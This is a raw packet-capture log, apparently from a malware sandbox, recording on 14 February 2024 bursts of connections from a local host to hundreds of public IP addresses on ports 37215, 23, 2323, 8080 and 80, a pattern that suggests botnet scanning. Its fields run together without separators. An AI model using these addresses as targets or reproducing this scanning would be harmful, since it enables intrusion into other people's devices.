                                                      Feb 14, 2024 09:28:48.056044102 CET67528080192.168.2.1531.201.170.128
                                                      Feb 14, 2024 09:28:48.056087971 CET355908080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.056107998 CET355908080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.056164980 CET355968080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.056785107 CET80803557694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.056837082 CET355768080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.072758913 CET805250695.47.167.65192.168.2.15
                                                      Feb 14, 2024 09:28:48.077214003 CET80803557694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.077229977 CET80803557694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.086218119 CET805250695.47.167.65192.168.2.15
                                                      Feb 14, 2024 09:28:48.086286068 CET5250680192.168.2.1595.47.167.65
                                                      Feb 14, 2024 09:28:48.087435961 CET80803559294.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.087534904 CET355928080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.087565899 CET355928080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.103914022 CET80803557694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.103964090 CET355768080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.118220091 CET805264295.215.242.21192.168.2.15
                                                      Feb 14, 2024 09:28:48.118473053 CET5264280192.168.2.1595.215.242.21
                                                      Feb 14, 2024 09:28:48.130448103 CET805429095.86.78.146192.168.2.15
                                                      Feb 14, 2024 09:28:48.143660069 CET80805893494.122.18.192192.168.2.15
                                                      Feb 14, 2024 09:28:48.143721104 CET589348080192.168.2.1594.122.18.192
                                                      Feb 14, 2024 09:28:48.143763065 CET589348080192.168.2.1594.122.18.192
                                                      Feb 14, 2024 09:28:48.144081116 CET80805571294.123.65.84192.168.2.15
                                                      Feb 14, 2024 09:28:48.145584106 CET80803557694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.145638943 CET355768080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.147320032 CET80805892294.122.18.192192.168.2.15
                                                      Feb 14, 2024 09:28:48.162884951 CET805755295.209.129.238192.168.2.15
                                                      Feb 14, 2024 09:28:48.162950993 CET5755280192.168.2.1595.209.129.238
                                                      Feb 14, 2024 09:28:48.171768904 CET805429095.86.78.146192.168.2.15
                                                      Feb 14, 2024 09:28:48.171822071 CET5429080192.168.2.1595.86.78.146
                                                      Feb 14, 2024 09:28:48.220530033 CET8080675295.111.213.230192.168.2.15
                                                      Feb 14, 2024 09:28:48.250511885 CET8080675295.152.230.214192.168.2.15
                                                      Feb 14, 2024 09:28:48.261221886 CET8080675285.8.188.195192.168.2.15
                                                      Feb 14, 2024 09:28:48.261238098 CET8080675231.220.205.195192.168.2.15
                                                      Feb 14, 2024 09:28:48.266602993 CET8080675285.252.17.117192.168.2.15
                                                      Feb 14, 2024 09:28:48.269639015 CET8080675285.24.150.148192.168.2.15
                                                      Feb 14, 2024 09:28:48.270039082 CET8080675295.111.250.56192.168.2.15
                                                      Feb 14, 2024 09:28:48.270454884 CET8080675294.158.191.102192.168.2.15
                                                      Feb 14, 2024 09:28:48.275357962 CET8080675295.96.165.1192.168.2.15
                                                      Feb 14, 2024 09:28:48.276767969 CET8080675262.44.112.6192.168.2.15
                                                      Feb 14, 2024 09:28:48.280327082 CET807840112.173.109.96192.168.2.15
                                                      Feb 14, 2024 09:28:48.282710075 CET8080675295.224.169.133192.168.2.15
                                                      Feb 14, 2024 09:28:48.283776999 CET8080675295.111.70.231192.168.2.15
                                                      Feb 14, 2024 09:28:48.284876108 CET8080675295.62.44.57192.168.2.15
                                                      Feb 14, 2024 09:28:48.285144091 CET807840112.169.120.242192.168.2.15
                                                      Feb 14, 2024 09:28:48.285233974 CET784080192.168.2.15112.169.120.242
                                                      Feb 14, 2024 09:28:48.287405014 CET8080675295.247.246.112192.168.2.15
                                                      Feb 14, 2024 09:28:48.287488937 CET8080675295.60.85.105192.168.2.15
                                                      Feb 14, 2024 09:28:48.287538052 CET80803559294.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.287585020 CET355928080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.288019896 CET807840112.166.212.55192.168.2.15
                                                      Feb 14, 2024 09:28:48.288063049 CET784080192.168.2.15112.166.212.55
                                                      Feb 14, 2024 09:28:48.288661957 CET80803559694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.288717985 CET355968080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.288772106 CET355968080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.289309978 CET8080675285.93.234.151192.168.2.15
                                                      Feb 14, 2024 09:28:48.289448977 CET67528080192.168.2.1585.93.234.151
                                                      Feb 14, 2024 09:28:48.296912909 CET807840112.171.201.239192.168.2.15
                                                      Feb 14, 2024 09:28:48.298100948 CET8080675294.77.114.93192.168.2.15
                                                      Feb 14, 2024 09:28:48.299757957 CET809637215192.168.2.1541.189.34.44
                                                      Feb 14, 2024 09:28:48.299781084 CET809637215192.168.2.1541.63.196.82
                                                      Feb 14, 2024 09:28:48.299809933 CET809637215192.168.2.1541.164.236.234
                                                      Feb 14, 2024 09:28:48.299809933 CET809637215192.168.2.1541.245.221.142
                                                      Feb 14, 2024 09:28:48.299828053 CET809637215192.168.2.1541.89.7.153
                                                      Feb 14, 2024 09:28:48.299844980 CET809637215192.168.2.1541.194.204.74
                                                      Feb 14, 2024 09:28:48.299844980 CET809637215192.168.2.1541.62.168.104
                                                      Feb 14, 2024 09:28:48.299886942 CET809637215192.168.2.1541.165.58.43
                                                      Feb 14, 2024 09:28:48.299887896 CET809637215192.168.2.1541.92.40.254
                                                      Feb 14, 2024 09:28:48.299910069 CET809637215192.168.2.1541.213.176.244
                                                      Feb 14, 2024 09:28:48.299910069 CET809637215192.168.2.1541.96.112.127
                                                      Feb 14, 2024 09:28:48.299927950 CET809637215192.168.2.1541.88.246.113
                                                      Feb 14, 2024 09:28:48.299937010 CET809637215192.168.2.1541.197.216.52
                                                      Feb 14, 2024 09:28:48.299952984 CET809637215192.168.2.1541.46.251.29
                                                      Feb 14, 2024 09:28:48.299973965 CET809637215192.168.2.1541.178.32.142
                                                      Feb 14, 2024 09:28:48.299983025 CET809637215192.168.2.1541.115.17.214
                                                      Feb 14, 2024 09:28:48.299995899 CET809637215192.168.2.1541.154.226.51
                                                      Feb 14, 2024 09:28:48.300014019 CET809637215192.168.2.1541.94.239.169
                                                      Feb 14, 2024 09:28:48.300023079 CET809637215192.168.2.1541.169.42.200
                                                      Feb 14, 2024 09:28:48.300041914 CET809637215192.168.2.1541.110.172.15
                                                      Feb 14, 2024 09:28:48.300062895 CET809637215192.168.2.1541.48.158.42
                                                      Feb 14, 2024 09:28:48.300071001 CET809637215192.168.2.1541.248.220.68
                                                      Feb 14, 2024 09:28:48.300086975 CET809637215192.168.2.1541.5.227.179
                                                      Feb 14, 2024 09:28:48.300107002 CET809637215192.168.2.1541.154.77.37
                                                      Feb 14, 2024 09:28:48.300123930 CET809637215192.168.2.1541.108.54.227
                                                      Feb 14, 2024 09:28:48.300147057 CET809637215192.168.2.1541.54.107.229
                                                      Feb 14, 2024 09:28:48.300153971 CET809637215192.168.2.1541.225.201.36
                                                      Feb 14, 2024 09:28:48.300183058 CET809637215192.168.2.1541.121.84.20
                                                      Feb 14, 2024 09:28:48.300196886 CET809637215192.168.2.1541.105.80.189
                                                      Feb 14, 2024 09:28:48.300220013 CET809637215192.168.2.1541.96.150.15
                                                      Feb 14, 2024 09:28:48.300231934 CET809637215192.168.2.1541.185.30.240
                                                      Feb 14, 2024 09:28:48.300254107 CET809637215192.168.2.1541.167.143.230
                                                      Feb 14, 2024 09:28:48.300254107 CET809637215192.168.2.1541.54.245.146
                                                      Feb 14, 2024 09:28:48.300270081 CET809637215192.168.2.1541.141.29.82
                                                      Feb 14, 2024 09:28:48.300281048 CET809637215192.168.2.1541.29.122.228
                                                      Feb 14, 2024 09:28:48.300297022 CET809637215192.168.2.1541.126.33.21
                                                      Feb 14, 2024 09:28:48.300302982 CET809637215192.168.2.1541.182.17.234
                                                      Feb 14, 2024 09:28:48.300323963 CET809637215192.168.2.1541.87.84.60
                                                      Feb 14, 2024 09:28:48.300339937 CET809637215192.168.2.1541.165.20.14
                                                      Feb 14, 2024 09:28:48.300350904 CET809637215192.168.2.1541.237.161.111
                                                      Feb 14, 2024 09:28:48.300363064 CET809637215192.168.2.1541.191.228.29
                                                      Feb 14, 2024 09:28:48.300369978 CET809637215192.168.2.1541.46.54.30
                                                      Feb 14, 2024 09:28:48.300383091 CET809637215192.168.2.1541.4.77.29
                                                      Feb 14, 2024 09:28:48.300395012 CET809637215192.168.2.1541.46.212.37
                                                      Feb 14, 2024 09:28:48.300409079 CET809637215192.168.2.1541.38.149.22
                                                      Feb 14, 2024 09:28:48.300426960 CET809637215192.168.2.1541.8.19.195
                                                      Feb 14, 2024 09:28:48.300437927 CET809637215192.168.2.1541.227.22.97
                                                      Feb 14, 2024 09:28:48.300453901 CET809637215192.168.2.1541.17.32.252
                                                      Feb 14, 2024 09:28:48.300468922 CET809637215192.168.2.1541.114.105.67
                                                      Feb 14, 2024 09:28:48.300483942 CET809637215192.168.2.1541.232.235.172
                                                      Feb 14, 2024 09:28:48.300487995 CET809637215192.168.2.1541.42.4.170
                                                      Feb 14, 2024 09:28:48.300513983 CET809637215192.168.2.1541.90.248.39
                                                      Feb 14, 2024 09:28:48.300524950 CET809637215192.168.2.1541.195.18.239
                                                      Feb 14, 2024 09:28:48.300543070 CET809637215192.168.2.1541.61.14.120
                                                      Feb 14, 2024 09:28:48.300553083 CET809637215192.168.2.1541.143.139.158
                                                      Feb 14, 2024 09:28:48.300575972 CET809637215192.168.2.1541.147.137.35
                                                      Feb 14, 2024 09:28:48.300581932 CET809637215192.168.2.1541.17.90.173
                                                      Feb 14, 2024 09:28:48.300602913 CET809637215192.168.2.1541.158.43.235
                                                      Feb 14, 2024 09:28:48.300616980 CET809637215192.168.2.1541.245.49.130
                                                      Feb 14, 2024 09:28:48.300638914 CET809637215192.168.2.1541.155.137.50
                                                      Feb 14, 2024 09:28:48.300652981 CET809637215192.168.2.1541.54.213.244
                                                      Feb 14, 2024 09:28:48.300663948 CET809637215192.168.2.1541.47.55.78
                                                      Feb 14, 2024 09:28:48.300683022 CET809637215192.168.2.1541.234.134.104
                                                      Feb 14, 2024 09:28:48.300690889 CET809637215192.168.2.1541.188.13.103
                                                      Feb 14, 2024 09:28:48.300709963 CET809637215192.168.2.1541.92.6.201
                                                      Feb 14, 2024 09:28:48.300723076 CET809637215192.168.2.1541.252.27.201
                                                      Feb 14, 2024 09:28:48.300733089 CET809637215192.168.2.1541.192.181.240
                                                      Feb 14, 2024 09:28:48.300751925 CET809637215192.168.2.1541.54.108.202
                                                      Feb 14, 2024 09:28:48.300759077 CET809637215192.168.2.1541.1.126.213
                                                      Feb 14, 2024 09:28:48.300769091 CET809637215192.168.2.1541.66.78.128
                                                      Feb 14, 2024 09:28:48.300782919 CET809637215192.168.2.1541.117.5.140
                                                      Feb 14, 2024 09:28:48.300797939 CET809637215192.168.2.1541.163.46.143
                                                      Feb 14, 2024 09:28:48.300812960 CET809637215192.168.2.1541.81.13.218
                                                      Feb 14, 2024 09:28:48.300822973 CET809637215192.168.2.1541.10.27.92
                                                      Feb 14, 2024 09:28:48.300837040 CET809637215192.168.2.1541.150.150.199
                                                      Feb 14, 2024 09:28:48.300851107 CET809637215192.168.2.1541.52.143.118
                                                      Feb 14, 2024 09:28:48.300858974 CET809637215192.168.2.1541.27.177.88
                                                      Feb 14, 2024 09:28:48.300868988 CET809637215192.168.2.1541.75.122.146
                                                      Feb 14, 2024 09:28:48.300893068 CET809637215192.168.2.1541.66.30.91
                                                      Feb 14, 2024 09:28:48.300893068 CET809637215192.168.2.1541.238.181.101
                                                      Feb 14, 2024 09:28:48.300905943 CET809637215192.168.2.1541.73.12.118
                                                      Feb 14, 2024 09:28:48.300928116 CET809637215192.168.2.1541.156.79.146
                                                      Feb 14, 2024 09:28:48.300934076 CET809637215192.168.2.1541.25.235.151
                                                      Feb 14, 2024 09:28:48.300947905 CET809637215192.168.2.1541.167.228.249
                                                      Feb 14, 2024 09:28:48.300964117 CET809637215192.168.2.1541.216.116.107
                                                      Feb 14, 2024 09:28:48.300973892 CET809637215192.168.2.1541.122.89.146
                                                      Feb 14, 2024 09:28:48.300981045 CET8080675231.31.23.180192.168.2.15
                                                      Feb 14, 2024 09:28:48.300992012 CET809637215192.168.2.1541.196.247.173
                                                      Feb 14, 2024 09:28:48.301017046 CET809637215192.168.2.1541.254.90.193
                                                      Feb 14, 2024 09:28:48.301049948 CET809637215192.168.2.1541.124.186.216
                                                      Feb 14, 2024 09:28:48.301053047 CET809637215192.168.2.1541.249.249.34
                                                      Feb 14, 2024 09:28:48.301068068 CET809637215192.168.2.1541.106.208.53
                                                      Feb 14, 2024 09:28:48.301081896 CET809637215192.168.2.1541.241.111.88
                                                      Feb 14, 2024 09:28:48.301100016 CET809637215192.168.2.1541.210.92.109
                                                      Feb 14, 2024 09:28:48.301107883 CET809637215192.168.2.1541.50.172.192
                                                      Feb 14, 2024 09:28:48.301124096 CET809637215192.168.2.1541.200.120.215
                                                      Feb 14, 2024 09:28:48.301132917 CET809637215192.168.2.1541.229.30.250
                                                      Feb 14, 2024 09:28:48.301146984 CET809637215192.168.2.1541.142.0.102
                                                      Feb 14, 2024 09:28:48.301167965 CET809637215192.168.2.1541.2.235.46
                                                      Feb 14, 2024 09:28:48.301175117 CET809637215192.168.2.1541.200.227.123
                                                      Feb 14, 2024 09:28:48.301187038 CET809637215192.168.2.1541.217.194.243
                                                      Feb 14, 2024 09:28:48.301211119 CET809637215192.168.2.1541.221.40.26
                                                      Feb 14, 2024 09:28:48.301213026 CET809637215192.168.2.1541.168.241.24
                                                      Feb 14, 2024 09:28:48.301229000 CET809637215192.168.2.1541.5.27.125
                                                      Feb 14, 2024 09:28:48.301245928 CET809637215192.168.2.1541.95.14.238
                                                      Feb 14, 2024 09:28:48.301248074 CET809637215192.168.2.1541.40.58.83
                                                      Feb 14, 2024 09:28:48.301268101 CET809637215192.168.2.1541.171.6.219
                                                      Feb 14, 2024 09:28:48.301281929 CET809637215192.168.2.1541.231.130.233
                                                      Feb 14, 2024 09:28:48.301306963 CET809637215192.168.2.1541.218.110.125
                                                      Feb 14, 2024 09:28:48.301314116 CET809637215192.168.2.1541.39.191.56
                                                      Feb 14, 2024 09:28:48.301332951 CET809637215192.168.2.1541.169.73.226
                                                      Feb 14, 2024 09:28:48.301348925 CET809637215192.168.2.1541.239.230.138
                                                      Feb 14, 2024 09:28:48.301361084 CET809637215192.168.2.1541.155.247.119
                                                      Feb 14, 2024 09:28:48.301378965 CET809637215192.168.2.1541.161.59.180
                                                      Feb 14, 2024 09:28:48.301389933 CET809637215192.168.2.1541.195.50.56
                                                      Feb 14, 2024 09:28:48.301407099 CET809637215192.168.2.1541.195.204.159
                                                      Feb 14, 2024 09:28:48.301409006 CET809637215192.168.2.1541.171.206.157
                                                      Feb 14, 2024 09:28:48.301425934 CET809637215192.168.2.1541.196.202.0
                                                      Feb 14, 2024 09:28:48.301445007 CET809637215192.168.2.1541.152.248.159
                                                      Feb 14, 2024 09:28:48.301454067 CET809637215192.168.2.1541.62.26.154
                                                      Feb 14, 2024 09:28:48.301475048 CET809637215192.168.2.1541.29.239.210
                                                      Feb 14, 2024 09:28:48.301489115 CET809637215192.168.2.1541.167.125.17
                                                      Feb 14, 2024 09:28:48.301501036 CET809637215192.168.2.1541.25.180.96
                                                      Feb 14, 2024 09:28:48.301507950 CET809637215192.168.2.1541.178.247.121
                                                      Feb 14, 2024 09:28:48.301528931 CET809637215192.168.2.1541.199.2.138
                                                      Feb 14, 2024 09:28:48.301532984 CET809637215192.168.2.1541.65.152.138
                                                      Feb 14, 2024 09:28:48.301554918 CET809637215192.168.2.1541.178.165.143
                                                      Feb 14, 2024 09:28:48.301568031 CET809637215192.168.2.1541.160.127.97
                                                      Feb 14, 2024 09:28:48.301580906 CET809637215192.168.2.1541.36.207.211
                                                      Feb 14, 2024 09:28:48.301584959 CET809637215192.168.2.1541.52.186.72
                                                      Feb 14, 2024 09:28:48.301603079 CET809637215192.168.2.1541.148.127.122
                                                      Feb 14, 2024 09:28:48.301624060 CET809637215192.168.2.1541.219.183.227
                                                      Feb 14, 2024 09:28:48.301639080 CET809637215192.168.2.1541.94.7.157
                                                      Feb 14, 2024 09:28:48.301654100 CET809637215192.168.2.1541.244.134.13
                                                      Feb 14, 2024 09:28:48.301665068 CET809637215192.168.2.1541.183.72.50
                                                      Feb 14, 2024 09:28:48.301672935 CET809637215192.168.2.1541.197.198.118
                                                      Feb 14, 2024 09:28:48.301695108 CET809637215192.168.2.1541.79.223.211
                                                      Feb 14, 2024 09:28:48.301713943 CET809637215192.168.2.1541.154.69.237
                                                      Feb 14, 2024 09:28:48.301713943 CET809637215192.168.2.1541.53.157.250
                                                      Feb 14, 2024 09:28:48.301740885 CET809637215192.168.2.1541.55.81.43
                                                      Feb 14, 2024 09:28:48.301743031 CET809637215192.168.2.1541.155.16.85
                                                      Feb 14, 2024 09:28:48.301753998 CET809637215192.168.2.1541.131.243.52
                                                      Feb 14, 2024 09:28:48.301769018 CET809637215192.168.2.1541.95.241.36
                                                      Feb 14, 2024 09:28:48.301786900 CET809637215192.168.2.1541.130.33.239
                                                      Feb 14, 2024 09:28:48.301799059 CET809637215192.168.2.1541.137.138.228
                                                      Feb 14, 2024 09:28:48.301804066 CET809637215192.168.2.1541.194.185.78
                                                      Feb 14, 2024 09:28:48.301812887 CET809637215192.168.2.1541.39.114.235
                                                      Feb 14, 2024 09:28:48.301835060 CET809637215192.168.2.1541.44.231.181
                                                      Feb 14, 2024 09:28:48.301848888 CET809637215192.168.2.1541.106.112.167
                                                      Feb 14, 2024 09:28:48.301857948 CET809637215192.168.2.1541.144.249.105
                                                      Feb 14, 2024 09:28:48.301872015 CET809637215192.168.2.1541.52.132.165
                                                      Feb 14, 2024 09:28:48.301884890 CET809637215192.168.2.1541.191.34.97
                                                      Feb 14, 2024 09:28:48.301899910 CET809637215192.168.2.1541.220.50.72
                                                      Feb 14, 2024 09:28:48.301914930 CET809637215192.168.2.1541.34.100.47
                                                      Feb 14, 2024 09:28:48.301923037 CET809637215192.168.2.1541.231.77.177
                                                      Feb 14, 2024 09:28:48.301942110 CET809637215192.168.2.1541.87.18.129
                                                      Feb 14, 2024 09:28:48.301942110 CET809637215192.168.2.1541.227.57.49
                                                      Feb 14, 2024 09:28:48.301956892 CET809637215192.168.2.1541.175.33.195
                                                      Feb 14, 2024 09:28:48.301965952 CET809637215192.168.2.1541.68.176.81
                                                      Feb 14, 2024 09:28:48.301980019 CET809637215192.168.2.1541.47.47.160
                                                      Feb 14, 2024 09:28:48.301991940 CET809637215192.168.2.1541.211.136.134
                                                      Feb 14, 2024 09:28:48.304655075 CET8080675295.134.11.200192.168.2.15
                                                      Feb 14, 2024 09:28:48.309658051 CET80803559294.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.313999891 CET803645495.58.76.157192.168.2.15
                                                      Feb 14, 2024 09:28:48.314052105 CET3645480192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:48.315314054 CET497128080192.168.2.1531.136.153.210
                                                      Feb 14, 2024 09:28:48.316123009 CET8080675285.250.208.43192.168.2.15
                                                      Feb 14, 2024 09:28:48.316176891 CET803482695.111.218.63192.168.2.15
                                                      Feb 14, 2024 09:28:48.316220045 CET3482680192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:48.325447083 CET8080675231.146.185.239192.168.2.15
                                                      Feb 14, 2024 09:28:48.326147079 CET8080675285.250.213.162192.168.2.15
                                                      Feb 14, 2024 09:28:48.326531887 CET8080675231.146.66.31192.168.2.15
                                                      Feb 14, 2024 09:28:48.341034889 CET807840112.210.82.137192.168.2.15
                                                      Feb 14, 2024 09:28:48.378983974 CET80803557694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.389566898 CET80805893494.122.18.192192.168.2.15
                                                      Feb 14, 2024 09:28:48.424921036 CET8080675295.181.231.226192.168.2.15
                                                      Feb 14, 2024 09:28:48.432679892 CET11842323192.168.2.15111.228.162.207
                                                      Feb 14, 2024 09:28:48.432687998 CET118423192.168.2.1561.94.187.110
                                                      Feb 14, 2024 09:28:48.432687998 CET118423192.168.2.1590.6.251.32
                                                      Feb 14, 2024 09:28:48.432698965 CET118423192.168.2.15212.46.90.139
                                                      Feb 14, 2024 09:28:48.432709932 CET118423192.168.2.1591.210.149.147
                                                      Feb 14, 2024 09:28:48.432709932 CET118423192.168.2.15186.2.132.161
                                                      Feb 14, 2024 09:28:48.432725906 CET11842323192.168.2.15139.48.145.215
                                                      Feb 14, 2024 09:28:48.432734013 CET118423192.168.2.15145.190.0.76
                                                      Feb 14, 2024 09:28:48.432751894 CET118423192.168.2.1585.217.134.154
                                                      Feb 14, 2024 09:28:48.432751894 CET118423192.168.2.1592.181.179.145
                                                      Feb 14, 2024 09:28:48.432760954 CET118423192.168.2.15145.139.89.81
                                                      Feb 14, 2024 09:28:48.432764053 CET118423192.168.2.15201.19.2.109
                                                      Feb 14, 2024 09:28:48.432769060 CET118423192.168.2.158.30.128.35
                                                      Feb 14, 2024 09:28:48.432769060 CET118423192.168.2.15108.46.58.201
                                                      Feb 14, 2024 09:28:48.432769060 CET118423192.168.2.1524.62.198.78
                                                      Feb 14, 2024 09:28:48.432769060 CET118423192.168.2.15202.107.163.121
                                                      Feb 14, 2024 09:28:48.432777882 CET118423192.168.2.15104.243.219.33
                                                      Feb 14, 2024 09:28:48.432779074 CET118423192.168.2.1518.189.80.100
                                                      Feb 14, 2024 09:28:48.432794094 CET118423192.168.2.15184.131.78.182
                                                      Feb 14, 2024 09:28:48.432806969 CET118423192.168.2.1582.136.8.27
                                                      Feb 14, 2024 09:28:48.432809114 CET118423192.168.2.15217.162.25.103
                                                      Feb 14, 2024 09:28:48.432807922 CET11842323192.168.2.1593.120.7.67
                                                      Feb 14, 2024 09:28:48.432813883 CET118423192.168.2.1552.219.102.74
                                                      Feb 14, 2024 09:28:48.432813883 CET118423192.168.2.15122.225.246.21
                                                      Feb 14, 2024 09:28:48.432821035 CET118423192.168.2.15164.91.222.127
                                                      Feb 14, 2024 09:28:48.432821989 CET118423192.168.2.1549.103.151.152
                                                      Feb 14, 2024 09:28:48.432830095 CET118423192.168.2.1591.64.16.127
                                                      Feb 14, 2024 09:28:48.432832003 CET118423192.168.2.15137.181.172.35
                                                      Feb 14, 2024 09:28:48.432845116 CET118423192.168.2.15204.26.34.148
                                                      Feb 14, 2024 09:28:48.432849884 CET11842323192.168.2.15158.99.141.21
                                                      Feb 14, 2024 09:28:48.432849884 CET118423192.168.2.1559.193.146.82
                                                      Feb 14, 2024 09:28:48.432852983 CET118423192.168.2.15105.94.58.106
                                                      Feb 14, 2024 09:28:48.432852983 CET118423192.168.2.1546.37.131.100
                                                      Feb 14, 2024 09:28:48.432857037 CET118423192.168.2.1535.37.162.84
                                                      Feb 14, 2024 09:28:48.432862997 CET118423192.168.2.15220.161.99.150
                                                      Feb 14, 2024 09:28:48.432878971 CET118423192.168.2.15162.128.36.232
                                                      Feb 14, 2024 09:28:48.432878971 CET118423192.168.2.1560.8.133.174
                                                      Feb 14, 2024 09:28:48.432883024 CET118423192.168.2.15213.83.55.174
                                                      Feb 14, 2024 09:28:48.432883978 CET118423192.168.2.15141.194.55.245
                                                      Feb 14, 2024 09:28:48.432887077 CET118423192.168.2.15213.130.144.65
                                                      Feb 14, 2024 09:28:48.432898045 CET118423192.168.2.15114.146.133.75
                                                      Feb 14, 2024 09:28:48.432903051 CET118423192.168.2.15190.192.228.230
                                                      Feb 14, 2024 09:28:48.432904959 CET11842323192.168.2.1560.94.183.191
                                                      Feb 14, 2024 09:28:48.432909966 CET118423192.168.2.15168.13.221.227
                                                      Feb 14, 2024 09:28:48.432917118 CET118423192.168.2.15111.228.18.183
                                                      Feb 14, 2024 09:28:48.432926893 CET118423192.168.2.1592.195.185.199
                                                      Feb 14, 2024 09:28:48.432934046 CET118423192.168.2.15125.160.147.34
                                                      Feb 14, 2024 09:28:48.432936907 CET118423192.168.2.15104.239.223.246
                                                      Feb 14, 2024 09:28:48.432946920 CET118423192.168.2.151.101.168.15
                                                      Feb 14, 2024 09:28:48.432950974 CET118423192.168.2.15183.52.206.199
                                                      Feb 14, 2024 09:28:48.432960033 CET11842323192.168.2.15134.91.83.166
                                                      Feb 14, 2024 09:28:48.432969093 CET118423192.168.2.159.3.161.164
                                                      Feb 14, 2024 09:28:48.432976961 CET118423192.168.2.15165.46.132.5
                                                      Feb 14, 2024 09:28:48.432976961 CET118423192.168.2.1535.131.43.92
                                                      Feb 14, 2024 09:28:48.432982922 CET118423192.168.2.15168.133.37.255
                                                      Feb 14, 2024 09:28:48.432992935 CET118423192.168.2.1565.54.81.252
                                                      Feb 14, 2024 09:28:48.432992935 CET118423192.168.2.15132.138.105.119
                                                      Feb 14, 2024 09:28:48.432997942 CET118423192.168.2.15182.3.127.226
                                                      Feb 14, 2024 09:28:48.433008909 CET118423192.168.2.15143.16.102.239
                                                      Feb 14, 2024 09:28:48.433016062 CET118423192.168.2.15169.71.22.252
                                                      Feb 14, 2024 09:28:48.433021069 CET11842323192.168.2.15163.153.220.170
                                                      Feb 14, 2024 09:28:48.433027029 CET118423192.168.2.15190.241.84.177
                                                      Feb 14, 2024 09:28:48.433027029 CET118423192.168.2.1590.97.203.130
                                                      Feb 14, 2024 09:28:48.433034897 CET118423192.168.2.15205.253.179.87
                                                      Feb 14, 2024 09:28:48.433037996 CET118423192.168.2.15187.224.34.63
                                                      Feb 14, 2024 09:28:48.433046103 CET118423192.168.2.1571.122.41.37
                                                      Feb 14, 2024 09:28:48.433051109 CET118423192.168.2.15220.242.109.210
                                                      Feb 14, 2024 09:28:48.433065891 CET118423192.168.2.15135.100.49.180
                                                      Feb 14, 2024 09:28:48.433068991 CET118423192.168.2.15147.8.104.228
                                                      Feb 14, 2024 09:28:48.433080912 CET11842323192.168.2.1566.191.230.192
                                                      Feb 14, 2024 09:28:48.433085918 CET118423192.168.2.15101.186.44.39
                                                      Feb 14, 2024 09:28:48.433085918 CET118423192.168.2.15107.29.102.33
                                                      Feb 14, 2024 09:28:48.433098078 CET118423192.168.2.1579.187.215.24
                                                      Feb 14, 2024 09:28:48.433098078 CET118423192.168.2.15200.219.159.136
                                                      Feb 14, 2024 09:28:48.433099031 CET118423192.168.2.15120.13.100.160
                                                      Feb 14, 2024 09:28:48.433098078 CET118423192.168.2.15175.120.167.130
                                                      Feb 14, 2024 09:28:48.433110952 CET118423192.168.2.15164.131.223.96
                                                      Feb 14, 2024 09:28:48.433115959 CET118423192.168.2.1573.28.188.82
                                                      Feb 14, 2024 09:28:48.433118105 CET118423192.168.2.15156.160.85.136
                                                      Feb 14, 2024 09:28:48.433130026 CET118423192.168.2.1588.126.0.29
                                                      Feb 14, 2024 09:28:48.433134079 CET11842323192.168.2.15218.115.59.87
                                                      Feb 14, 2024 09:28:48.433145046 CET118423192.168.2.15137.101.89.210
                                                      Feb 14, 2024 09:28:48.433150053 CET118423192.168.2.15185.79.122.54
                                                      Feb 14, 2024 09:28:48.433154106 CET118423192.168.2.1558.157.159.223
                                                      Feb 14, 2024 09:28:48.433154106 CET118423192.168.2.15144.176.251.27
                                                      Feb 14, 2024 09:28:48.433172941 CET118423192.168.2.15114.68.239.96
                                                      Feb 14, 2024 09:28:48.433176994 CET118423192.168.2.1519.41.10.152
                                                      Feb 14, 2024 09:28:48.433176994 CET118423192.168.2.1519.179.219.30
                                                      Feb 14, 2024 09:28:48.433180094 CET118423192.168.2.1550.197.77.18
                                                      Feb 14, 2024 09:28:48.433192968 CET118423192.168.2.15194.3.106.180
                                                      Feb 14, 2024 09:28:48.433196068 CET11842323192.168.2.15153.97.61.34
                                                      Feb 14, 2024 09:28:48.433203936 CET118423192.168.2.15190.81.219.159
                                                      Feb 14, 2024 09:28:48.433209896 CET118423192.168.2.15158.124.59.95
                                                      Feb 14, 2024 09:28:48.433217049 CET118423192.168.2.15218.5.137.56
                                                      Feb 14, 2024 09:28:48.433229923 CET118423192.168.2.15199.113.43.53
                                                      Feb 14, 2024 09:28:48.433229923 CET118423192.168.2.15168.42.39.239
                                                      Feb 14, 2024 09:28:48.433237076 CET118423192.168.2.1545.251.11.177
                                                      Feb 14, 2024 09:28:48.433243990 CET118423192.168.2.15131.201.24.122
                                                      Feb 14, 2024 09:28:48.433248997 CET118423192.168.2.1593.229.89.75
                                                      Feb 14, 2024 09:28:48.433250904 CET118423192.168.2.15220.191.14.53
                                                      Feb 14, 2024 09:28:48.433254004 CET11842323192.168.2.1536.238.45.248
                                                      Feb 14, 2024 09:28:48.433268070 CET118423192.168.2.15205.196.6.225
                                                      Feb 14, 2024 09:28:48.433270931 CET118423192.168.2.15171.52.70.36
                                                      Feb 14, 2024 09:28:48.433271885 CET118423192.168.2.1582.54.114.9
                                                      Feb 14, 2024 09:28:48.433281898 CET118423192.168.2.15147.145.217.161
                                                      Feb 14, 2024 09:28:48.433288097 CET118423192.168.2.15165.229.80.8
                                                      Feb 14, 2024 09:28:48.433290005 CET118423192.168.2.1563.37.208.178
                                                      Feb 14, 2024 09:28:48.433295965 CET118423192.168.2.15220.130.146.241
